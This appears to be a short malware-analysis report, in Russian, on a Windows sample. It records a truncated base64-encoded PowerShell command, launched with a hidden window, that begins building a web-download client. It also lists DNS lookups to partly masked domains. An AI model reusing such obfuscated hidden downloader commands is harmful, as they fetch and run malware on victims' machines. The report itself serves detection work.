Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpADYANgA5AF8ANgBfADIAPQAoACcAcwA2ADUAXwBfAF8AXwAnACsAJwAyACcAKQA7ACQAaAA3ADYAOQA0ADIAXwA2AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAOABfADUANQAyADkANAA9AC...
- DNS ASK me###ggroup.com
- DNS ASK va##kad.sk
- DNS ASK vi#####erm.dspharma.ca
- DNS ASK uc##k.com
- DNS ASK tv###dirim.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpADYANgA5AF8ANgBfADIAPQAoACcAcwA2ADUAXwBfAF8AXwAnACsAJwAyACcAKQA7ACQAaAA3ADYAOQA0ADIAXwA2AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAOABfADUANQAyADkANAA9AC...' (со скрытым окном)